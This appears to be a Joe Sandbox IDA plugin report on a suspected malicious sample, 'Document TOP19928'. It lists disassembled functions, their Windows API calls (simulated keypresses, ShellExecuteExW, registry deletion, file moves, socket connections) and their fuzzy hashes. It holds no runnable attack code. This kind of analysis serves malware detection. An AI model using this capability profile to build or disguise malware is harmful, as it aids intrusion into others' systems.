Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 0bbc72bce0ba19b6544efb690402a5836ecc16f68664e93ce114b084f02f431b
Instruction ID: 4c7485847df3c2457285143219ec976c4bf3e8c2e1c6ed3f4829743674c23b63
Opcode Fuzzy Hash: 0bbc72bce0ba19b6544efb690402a5836ecc16f68664e93ce114b084f02f431b
Instruction Fuzzy Hash: 72315D71904209EBDF10DF64DC89AAB7BB8FF84711F5441A5FA04EB246DB34DA14CBA4

Function 00856442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0085645A
GetDC.USER32(00000000), ref: 00856462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085646D
ReleaseDC.USER32(00000000,00000000), ref: 00856479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008564B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008564C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00859299,?,?,000000FF,00000000,?,000000FF,?), ref: 00856500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00856520

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cfa5cf7b21c7fddc2846682046178a3c2f5b94424578019780919794c13aa24b
Instruction ID: fee4200e38c927953faa4857c90f9f0559b91572bd93daac520f9611d3d4d030
Opcode Fuzzy Hash: cfa5cf7b21c7fddc2846682046178a3c2f5b94424578019780919794c13aa24b
Instruction Fuzzy Hash: 80317C72240610AFEF118F10CC4AFAB3FA9FF19762F040065FE08DA192E6799851CB64

Function 0082C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0082C087
_memcmp.LIBCMT ref: 0082C0A9
_memcmp.LIBCMT ref: 0082C0C1
_memcmp.LIBCMT ref: 0082C0D4
_memcmp.LIBCMT ref: 0082C0EE
_memcmp.LIBCMT ref: 0082C101
_memcmp.LIBCMT ref: 0082C119
_memcmp.LIBCMT ref: 0082C134

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 68f5e684f817dba528ce8751d2133f5e3f71b2a6992dfe0cba5d013c72400a8e
Instruction ID: 8ea74e33025dded7fc9950e45c72fd8a37db9b0a491726065a26126e0ba9b9df
Opcode Fuzzy Hash: 68f5e684f817dba528ce8751d2133f5e3f71b2a6992dfe0cba5d013c72400a8e
Instruction Fuzzy Hash: 5221B061641A29FBD214AA21AC46FBF379CFF207A9F440020FE05D63C2EB59DE61C5A5

Function 0083D7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CoInitialize.OLE32(00000000), ref: 0083D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0083D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0083D8FC
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0083D9B7
_memset.LIBCMT ref: 0083DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0083DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0083DAAB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
String ID:
API String ID: 3008154123-0
Opcode ID: 1c2ba26c70719cd97eea0cb36db27b0b09f041b571f30a9464ffc408d142df44
Instruction ID: fb09ad8459acdb0936fdf94224bfd7454bc619a3960c8b647571d40c314c78ad
Opcode Fuzzy Hash: 1c2ba26c70719cd97eea0cb36db27b0b09f041b571f30a9464ffc408d142df44
Instruction Fuzzy Hash: C6B1D975A00219EFDB04DF64D888DAEBBB9FF88314F148469F909EB251DB34AD45CB50

Function 007D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd91faa1e663863e697fafff69c36fa2e62749d451eda54bf5b0a06762dd1c0
Instruction ID: ce65a2fc616a4c2865fa4069ad8590467966d143db5e5a7792219a2c6b83b91a
Opcode Fuzzy Hash: 4cd91faa1e663863e697fafff69c36fa2e62749d451eda54bf5b0a06762dd1c0
Instruction Fuzzy Hash: 93715830900509FFCB04DF98CD89ABEBB79FF85314F54815AF915AB291D738AA51CBA0

Function 0085B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00F0F148), ref: 0085B6A5
IsWindowEnabled.USER32(00F0F148), ref: 0085B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0085B795
SendMessageW.USER32(00F0F148,000000B0,?,?), ref: 0085B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0085B809
GetWindowLongW.USER32(00F0F148,000000EC), ref: 0085B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0085B843

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 1bdfec7c921634699f356ee4b6a774764d4c37422c4e347d68fbcb5d5f0e2bf2
Instruction ID: 92a3f4e9398b398529890c634f501ffb354dc790cc258fb0e0d6f8f0366f1d6d
Opcode Fuzzy Hash: 1bdfec7c921634699f356ee4b6a774764d4c37422c4e347d68fbcb5d5f0e2bf2
Instruction Fuzzy Hash: B1719C34600204AFDB209FA4C894FBABBF9FFA9342F184069ED45D73A1D731A959CB50

Function 008486D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CoInitialize.OLE32 ref: 00848718
VariantInit.OLEAUT32(?), ref: 00848890
VariantClear.OLEAUT32(?), ref: 008488F1

Strings

NULL Pointer assignment, xrefs: 008487C8
Failed to create object, xrefs: 0084878E, 00848844
Invalid parameter, xrefs: 0084880F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Variant$ClearInitInitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 4106155388-1287834457
Opcode ID: 7822a9b307a968d141cf06ed4c0d830b4bff8273355c372797ddb3f71277feaf
Instruction ID: 73c7217b9b6560cf85b7d8b4cfd3391926ce1c559b38632f281e035e534bcd9f
Opcode Fuzzy Hash: 7822a9b307a968d141cf06ed4c0d830b4bff8273355c372797ddb3f71277feaf
Instruction Fuzzy Hash: AC615970608315EFD710DF24C998A6EBBE8FF88718F104829F995DB291DB74E944CB92

Function 0084F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084F75C
_memset.LIBCMT ref: 0084F825
ShellExecuteExW.SHELL32(?), ref: 0084F86A

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

GetProcessId.KERNEL32(00000000), ref: 0084F8E1
CloseHandle.KERNEL32(00000000), ref: 0084F910

Strings

@, xrefs: 0084F839

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 982ad7d49837dd60de44cd4ccd3d644f0cc34c4807e05d05d0631ed0951e02c2
Instruction ID: ed8a17f9b5963d924d23a3277519acb1e25ff286c0f910e6e68751fc1c6b4861
Opcode Fuzzy Hash: 982ad7d49837dd60de44cd4ccd3d644f0cc34c4807e05d05d0631ed0951e02c2
Instruction Fuzzy Hash: 9B618B75A00619DFCB14EF64C584AAEBBF5FF48310F14846EE94AAB352DB34AD40CB90

Function 0083145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0083149C
GetKeyboardState.USER32(?), ref: 008314B1
SetKeyboardState.USER32(?), ref: 00831512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00831540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0083155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 008315A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 008315C8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
Instruction ID: fa7890a809c030cd10874db6e214c6ae848fbc38cb6ddeeceeeb06c98aa7fdb2
Opcode Fuzzy Hash: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
Instruction Fuzzy Hash: 0D51F3A06047D53DFF324364CC49BBA7EA9BB86B04F0C4489E1D5868C2D7D89C94D791

Function 00831276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 008312B5
GetKeyboardState.USER32(?), ref: 008312CA
SetKeyboardState.USER32(?), ref: 0083132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00831357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00831374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008313B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008313D9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
Instruction ID: 2641255b3641ef68007f2e73cb720596d58fdc4497b83cee3e93a9cfc8a7e71d
Opcode Fuzzy Hash: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
Instruction Fuzzy Hash: A751F6A05047D53DFF3283248C49BBABFA9FF86B00F088589E1D4C69C2D799AC94D791

Function 0083589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 008358AC
_wcsncpy.LIBCMT ref: 008358E1
_wcsncpy.LIBCMT ref: 00835913
_wcsncpy.LIBCMT ref: 00835946
_wcsncpy.LIBCMT ref: 00835988
_wcsncpy.LIBCMT ref: 008359C2
_wcsncpy.LIBCMT ref: 008359F1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 02b3d85b5ba7c4d72d08c62113480e90ba88c5a79be3294507c6a4726d70be37
Instruction ID: fba50070dacd8c4b61ffe55a30651e661626e19461d3b9ec54d8b275ea45f4e9
Opcode Fuzzy Hash: 02b3d85b5ba7c4d72d08c62113480e90ba88c5a79be3294507c6a4726d70be37
Instruction Fuzzy Hash: A641A665C2152CB6CB10F7B4888E9DF77A8EF04710F508962FA18E3212E638D715D7EA

Function 008338AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008338D3,?), ref: 008348C7

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008338D3,?), ref: 008348E0

lstrcmpiW.KERNEL32(?,?), ref: 008338F3
_wcscmp.LIBCMT ref: 0083390F
MoveFileW.KERNEL32(?,?), ref: 00833927
_wcscat.LIBCMT ref: 0083396F
SHFileOperationW.SHELL32(?), ref: 008339DB

Strings

\*.*, xrefs: 00833969

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 31c584ae599d63e0f207a5d69c2249df4107f3b8f7eba6553442ada22c0ca75b
Instruction ID: c5e58f6bc44515c88b6bc9cf2c0a2475bd2f8bb8b3a89e93734cf5c139f25abc
Opcode Fuzzy Hash: 31c584ae599d63e0f207a5d69c2249df4107f3b8f7eba6553442ada22c0ca75b
Instruction Fuzzy Hash: 4B418171508344DACB51EF64C485AEBBBE8FF89350F00192EB489C3251EA78D689C792

Function 00857500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00857519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008575C0
IsMenu.USER32(?), ref: 008575D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00857620
DrawMenuBar.USER32 ref: 00857633

Strings

0, xrefs: 0085750D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 86a453c468e5cfabdc8ce00ddd9dc96f3febd03b06bca1feaec22914dbf0be76
Instruction ID: abb9cf552850afdda92cc000b92cfcff33fbca495123dcad231bd7b2ae9cfdfc
Opcode Fuzzy Hash: 86a453c468e5cfabdc8ce00ddd9dc96f3febd03b06bca1feaec22914dbf0be76
Instruction Fuzzy Hash: 4C414975A04609EFDB10DF54E884E9ABBF8FB14356F048129ED15E7250E730AD54CF90

Function 0085122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0085125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00851286
FreeLibrary.KERNEL32(00000000), ref: 0085133D

Part of subcall function 0085122D: RegCloseKey.ADVAPI32(?), ref: 008512A3
Part of subcall function 0085122D: FreeLibrary.KERNEL32(?), ref: 008512F5
Part of subcall function 0085122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00851318

RegDeleteKeyW.ADVAPI32(?,?), ref: 008512E0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 219bd862eeb43bb9a7b33a4ec84752026caa732c24fdf92ca061115d5e98b841
Instruction ID: a957ee09c19bf32188350a97d1aea59ebcb381d142dd93248fc9b42529ec2ef9
Opcode Fuzzy Hash: 219bd862eeb43bb9a7b33a4ec84752026caa732c24fdf92ca061115d5e98b841
Instruction Fuzzy Hash: 3B311B71901209BFDF15DB94DC99EFFB7BCFB08351F000169E911E2251DB789E499AA0

Function 0085653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0085655B
GetWindowLongW.USER32(00F0F148,000000F0), ref: 0085658E
GetWindowLongW.USER32(00F0F148,000000F0), ref: 008565C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008565F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0085661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00856630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0085664A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d354c11b479699b2d42373eff4e001f089a6c31600737fcfe77092d22a7a0dc5
Instruction ID: 5032a314279a49560937a0eaee171773167294148edb447c5f2c7164612647fd
Opcode Fuzzy Hash: d354c11b479699b2d42373eff4e001f089a6c31600737fcfe77092d22a7a0dc5
Instruction Fuzzy Hash: FB312430644210AFDB20DF18DC85F553BE1FB5A352F9801A9FA01DB2B6EB71AC68DB41

Function 00846486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008480A0: inet_addr.WS2_32(00000000), ref: 008480CB

socket.WS2_32(00000002,00000001,00000006), ref: 008464D9
WSAGetLastError.WS2_32(00000000), ref: 008464E8
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00846521
connect.WSOCK32(00000000,?,00000010), ref: 0084652A
WSAGetLastError.WS2_32 ref: 00846534
closesocket.WS2_32(00000000), ref: 0084655D
